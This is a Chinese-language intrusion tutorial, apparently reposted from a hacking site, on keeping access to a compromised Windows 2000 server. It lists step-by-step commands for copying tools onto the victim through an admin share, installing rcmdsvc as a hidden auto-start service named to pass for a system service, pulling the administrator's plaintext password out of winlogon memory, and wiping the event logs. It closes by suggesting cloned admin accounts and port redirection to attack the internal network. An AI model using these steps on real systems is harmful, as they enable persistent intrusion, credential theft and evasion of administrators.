在閱讀本文之前，假設你已經成功入侵了某臺Win2k主機并取得了管理員帳號，

Windows 2000入侵后后門的放置

。大多數時候我們入侵某臺主機的目的并不是為了直接破壞，可以在該主機上留下后門以便自己以后可以方便的“使用”該機。目前一般情況下，入侵Win2k后使用最多的后門是RemoteNc了，但該工具有一很大的缺點，容易被殺毒軟件查出，而且如果用fport或Active Ports等軟件也可以看到它監(jiān)聽的端口，這很容易讓管理員發(fā)現。對于Win2k下的后門推薦使用Win2k Resoruce Kit中自帶的一個小工具rcmdsvc.exe和rcmd.exe，這是微軟自己出的一個用來在命令行下遠程管理主機的小工具。它有以下優(yōu)點：

    1、不會被殺毒軟件認為是病毒或后門程序，畢竟這是微軟自己出的東西。

    2、非常隱蔽，它開的端口是445，和Win2k系統(tǒng)的Microsoft-DS服務開的端口一樣，用fport或Active Ports都不能列出它正在監(jiān)聽的端口。

    下面我們來看一次實際的操作

    當然進行以下操作之前假設已經具有以下條件：

    1、你已經取得了xxx.xxx.xxx.xxx的管理員權限

    2、該機啟用了tcp/ip上的Netbios支持

    3、在IP安全策略中對139和445端口未進行屏蔽

    4、安全策略中對匿名連接的額外限制采用的是默認的安全選項/*如果后三條中有某條不能滿足，那么會讓我們的后續(xù)操作有些困難，不過仍然有其它辦法可以繼續(xù)，如果大家感興趣我會在以后的文章中說明。

    c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"

    c:\>copy rcmdsvc.exe z:\winnt\system32

    c:\>copy pulist.exe z:\winnt\system32

    c:\>copy findpass.exe z:\winnt\system32

    c:\>copy kill.exe z:\winnt\system32

    c:\>copy clearel.exe z:\winnt\system32

    c:\>copy clealog.cmd z:\winnt\system32

    c:\>copy fpipe.exe z:\winnt\system32

    c:\>copy msvcp60.dll z:\winnt\system32

    拷貝一些常用的工具到對方服務器上，在這里對這些工具做一個簡要說明：

    rcmdsvc.exe Win2k Resource Kit中的遠程命令行服務器端程序

    pulist.exe 可以列出系統(tǒng)進程和該進程所屬用戶的工具

    findpass.exe 可以在winlogon.exe進程中查找指定用戶名的名文口令的工具

    kill.exe 可以用pdi或進程名殺掉指定進程的工具

    clearel.exe 清除系統(tǒng)、應用程序、安全日志的工具

    clealog.cmd 同上

    fpipe.exe 可以在命令行下做端口重定向的工具

    msvcp60.dll vc的運行庫，這個東西其實不是必須的，但為了防止在某些缺少

    msvcp60.dll的機上在運行clealog清除日志時對方的機上會突然彈出一個對話框說缺少msvcp60.dll的尷尬情況，最好把它一起復制過去。

    c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath=

    c:\winnt\system32\rcmdsvc.exe type= own start= auto

    在這里我們用sc在目標機xxx.xxx.xxx.xxx上創(chuàng)建了一個名為Remote Command Service的服務，啟動方式為自動。當然為了隱蔽，你最好把“Remote Command Service”這個服務名改成其它比較類似系統(tǒng)服務的名字，畢竟管理員不可能看著一個突然多出來的Remote Command而坐視不管，而且也顯的你太囂張了。

    ps:sc.exe是Win2k Resource Kit中一個功能非常強大的對服務進行控制的工具，

    詳細的使用方法可以參考本站的《sc使用完全指南》。

    c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"

    SERVICE_NAME: rpc support services

    TYPE : 10 WIN32_OWN_PROCESS

    STATE : 2 START_PENDING

    (NOT_STOPPABLE,NOT_PAUSABLE,

    IGNORES_SHUTDOWN)

    WIN32_EXIT_CODE : 0 (0x0)

    SERVICE_EXIT_CODE : 0 (0x0)

    CHECKPOINT : 0x0

    WAIT_HINT : 0x7d0

    在這里我們用sc啟動剛才創(chuàng)建的Remote Command Service服務。 下面連上對方服務器

    c:\>rcmd

    Enter Server Name : xxx.xxx.xxx.xxx

    Connect to \\xxx.xxx.xxx.xxx

    Microsoft Windows 2000 [Version 5.00.2195]

    (C) Copyright 1985-1999 Microsoft Corp.

    C:\Documents and Settings\Default User.WINNT>pulist

    Process PID User

    Idle 0

    System 8

    smss.exe 168 NT AUTHORITY\SYSTEM

    csrss.exe 192 NT AUTHORITY\SYSTEM

    winlogon.exe 212 NT AUTHORITY\SYSTEM

    services.exe 240 NT AUTHORITY\SYSTEM

    lsass.exe 252 NT AUTHORITY\SYSTEM

    svchost.exe 408 NT AUTHORITY\SYSTEM

    spoolsv.exe 436 NT AUTHORITY\SYSTEM

    msdtc.exe 464 NT AUTHORITY\SYSTEM

    svchost.exe 596 NT AUTHORITY\SYSTEM

    llssrv.exe 624 NT AUTHORITY\SYSTEM

    regsvc.exe 676 NT AUTHORITY\SYSTEM

    rpcsvc.exe 692 NT AUTHORITY\SYSTEM

    mstask.exe 716 NT AUTHORITY\SYSTEM

    LSESS.EXE 792 NT AUTHORITY\SYSTEM

    tlntsvr.exe 832 NT AUTHORITY\SYSTEM

    VrUpSvr.exe 956 NT AUTHORITY\SYSTEM

    winmgmt.exe 968 NT AUTHORITY\SYSTEM

    dns.exe 980 NT AUTHORITY\SYSTEM

    dfssvc.exe 1064 NT AUTHORITY\SYSTEM

    POP3S.exe 1100 NT AUTHORITY\SYSTEM

    smtpds.exe 1120 NT AUTHORITY\SYSTEM

    svchost.exe 1384 NT AUTHORITY\SYSTEM

    dllhost.exe 1316 NT AUTHORITY\SYSTEM

    internat.exe 1308 SERVER\Administrator

    conime.exe 1680 SERVER\Administrator

    VRMONSVC.EXE 872 NT AUTHORITY\SYSTEM

    inetinfo.exe 1456 NT AUTHORITY\SYSTEM

    explorer.exe 1548 SERVER\Administrator

    cmd.exe 1712 SERVER\Guest

    pulist.exe 532 SERVER\Guest

    我們可以看到winlogon.exe的進程號是212

    C:\Documents and Settings\Default User.WINNT>findpass server

    administrator 212

    To Find Password in the Winlogon process

    Usage: fidp DomainName UserName PID-of-WinLogon

    The debug privilege has been added to PasswordReminder.

    The WinLogon process id is 214 (0x000000d6).

    To find server\administrator password in process 214 ...

    The encoded password is found at 0x01a00800 and has a length of 3.

    The logon information is: server/administrator/Tgrh87fd.

    The hash byte is: 0xb8.

    在winlogon中查找administrator的名文口令

    C:\Documents and Settings\Default User.WINNT>clealog

    clealog done

    清除日志記錄

    C:\Documents and Settings\Default User.WINNT>

    到這里我們已經看到administrator的密碼是Tgrh87fd

    至此我們拿到了管理員的密碼并安放了一個rcmdsvc的后門，當然你還可以接著做許多事，

電腦資料

《Windows 2000入侵后后門的放置》(http://www.szmdbiao.com)。比如利用Adam發(fā)現的Bug再克隆一個管理員賬號�；蛘哂胹c把對方的Tlntsvr服務啟起來。不過后者比較容易被發(fā)現，不推薦。如果你對他的內網的某臺機感興趣而且該機也有漏洞，可以用fpipe做端口重定向后為下一步的進攻做準備